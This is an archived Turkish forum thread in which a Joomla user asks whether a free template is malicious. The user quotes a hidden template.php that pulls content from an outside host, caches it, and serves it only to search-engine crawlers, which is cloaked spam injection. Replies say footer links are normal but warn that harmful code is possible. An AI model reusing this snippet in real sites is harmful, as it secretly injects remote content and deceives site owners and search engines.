PDA

Orijinalini görmek için tıklayınız : free templatelerde içlerine birşeylermi yerleştiriyorlar?

gecekule
11-01-2014, 16:07
Merhaba,

joomla için free template ararız ve kullanırız, benim dikkatimi çeken birşey var

Site altında bir link koyuyorlar sildiğinde site açılmıyor bu yüzden kaldırmak zor

diğer benim dikkatımı çeken index.php içinde aşağıdaki kod var

<div id="post" class="col span_<?php echo $compwidth ?> clr">
<div id="comp-wrap">
<?php include "html/template.php"; ?>
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>

Burada dikkate çeken <?php include "html/template.php"; ?> bu nedir acaba?

template.php içeriği ise aşağıda

<?php
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me2.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) {
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}
?>

Bunlar nedir? tehlikesi varmı? ne yapmak lazım?

Teşekkürler

horoz nuri
12-01-2014, 03:03
Free templateler, footer kısımlarına kendi linklerini koyarlar. Çünkü bir emek vermişler ve tema yapmışlar. Kendilerini duyurmak, tanıtmak isterler. Footer kısmına koydukları linklerin kaldırılmasını tabi ki istemezler. Kendi linklerinin kaldırılmasını engellemek amacıyla bir takım kodlar da yazmış olabilirler. Bu gayet doğaldır.

Normal olmayan durum acaba zararlı kod koymuşlar mıdır? Kötü niyetli kişiler zararlı kod koymuş olabilirler. İncelemek lazım.

Sizin yukarıda yazdığınız kodlar hangi temaya ait, temayı nerden indirdiniz?

gecekule
12-01-2014, 14:05
Bunu kullanıyorum http://ajoomlatemplates.com/free-responsive-joomla-3.0-template/#comment-970
Ben emeklere saygı duyarım ve oradaki bir link beni rahatsız etmez benim derdim sizinde dediğiniz gibi zararlı birşey varmı? eğer zararlı birşey yoksa mesele yok

Teşekkürler